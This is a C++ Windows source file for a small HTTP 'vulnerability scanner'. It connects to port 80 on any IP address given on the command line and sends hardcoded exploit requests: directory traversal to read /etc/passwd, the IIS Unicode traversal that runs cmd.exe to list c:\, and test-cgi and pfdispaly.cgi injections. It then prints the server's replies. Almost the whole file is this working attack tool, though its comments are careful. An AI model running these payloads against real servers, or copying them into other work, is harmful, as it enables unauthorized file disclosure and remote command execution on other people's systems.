
📄 scanremoteserver.cpp

📁 一个用c++编写小巧漏洞扫描器
#include <stdio.h>  
#include <string.h>  
#include <winsock.h>  

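/*
 * Connects to TCP port 80 on the IPv4 address given as argv[1], sends a fixed
 * list of HTTP/1.0 GET requests over that one connection, and prints each
 * request followed by the bytes the server returned for it.
 *
 * The request lines are fixed probes: path traversal ("../" and an encoded
 * variant of it) and requests to legacy CGI / .ida endpoints.  The program
 * only echoes the raw reply; it does not decide whether a reply indicates
 * exposure.  The same literal request lines are what a server-side request
 * log would record for a run of this tool.
 *
 * Returns 0 when every request was sent and answered, -1 on a usage error,
 * a Winsock/socket failure, or when the server closed the connection early.
 */
int main(int argc, char *argv[])
{
	/*
	 * All locals are declared before the first goto so that no jump to a
	 * cleanup label crosses an initialization (ill-formed in C++).
	 */
	static const char *const ex[] = {
		"GET /../../../../etc/passwd HTTP/1.0\n\n",
		"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n",
		"GET /A.ida/%c1%00.ida HTTP/1.0\n\n",
		"GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n",
		"GET /cgi-bin/test-cgi?\\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n",
		"GET /cgi-bin/test-cgi?* HTTP/1.0\n\n"
	};
	const int request_count = (int)(sizeof(ex) / sizeof(ex[0]));
	WSADATA wsaData;
	SOCKET sock = INVALID_SOCKET;
	struct sockaddr_in blah;
	char buff[1024];	/* receive buffer; last byte is reserved for the NUL */
	int rc = -1;
	int i;

	/* Exactly one argument is expected: the target IPv4 address. */
	if (argc != 2) {
		printf("Useage: ScanRemoteServer [IP address]\n");
		return -1;
	}

	/* Initialise Winsock, requesting version 1.1. */
	if (WSAStartup(MAKEWORD(1, 1), &wsaData)) {
		printf("Winsock Initialization failed.\n");
		return -1;
	}

	/* Create the TCP socket. */
	sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock == INVALID_SOCKET) {
		printf("Can not create socket.\n");
		goto out_winsock;	/* the original skipped WSACleanup() here */
	}

	/* Fill in the remote endpoint: IPv4, port 80, address from argv[1]. */
	memset(&blah, 0, sizeof(blah));
	blah.sin_family = AF_INET;
	blah.sin_port = htons(80);
	blah.sin_addr.s_addr = inet_addr(argv[1]);
	/*
	 * inet_addr() reports a malformed address as INADDR_NONE, which is the
	 * same bit pattern as 255.255.255.255, so that address is rejected too.
	 */
	if (blah.sin_addr.s_addr == INADDR_NONE) {
		printf("Invalid IP address.\n");
		goto out_socket;
	}

	if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) != 0) {
		printf("Can not connect to server.\n");
		goto out_socket;
	}

	/*
	 * All requests go over the single connection opened above.  A server
	 * that closes the connection after answering one request makes a later
	 * send()/recv() fail or return 0; that is reported and the loop stops
	 * instead of printing an empty buffer.
	 */
	for (i = 0; i < request_count; i++) {
		const int len = (int)strlen(ex[i]);
		int sent = 0;
		int got;

		printf(">> %s\n", ex[i]);

		/* send() may accept fewer bytes than requested; loop until done. */
		while (sent < len) {
			int n = send(sock, ex[i] + sent, len - sent, 0);
			if (n == SOCKET_ERROR) {
				printf("send failed.\n");
				goto out_socket;
			}
			sent += n;
		}

		/*
		 * Read at most sizeof(buff) - 1 bytes and terminate by the returned
		 * length.  The original passed the full buffer size, so a 1024-byte
		 * reply left no NUL and printf("%s") read past the end of buff.
		 */
		got = recv(sock, buff, (int)sizeof(buff) - 1, 0);
		if (got == SOCKET_ERROR) {
			printf("recv failed.\n");
			goto out_socket;
		}
		if (got == 0) {
			printf("Connection closed by server.\n");
			break;
		}
		buff[got] = '\0';
		printf("<< %s\n\n", buff);
	}

	if (i == request_count) {
		rc = 0;
	}

out_socket:
	closesocket(sock);	/* the original leaked the socket on error paths */
out_winsock:
	WSACleanup();
	return rc;
}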
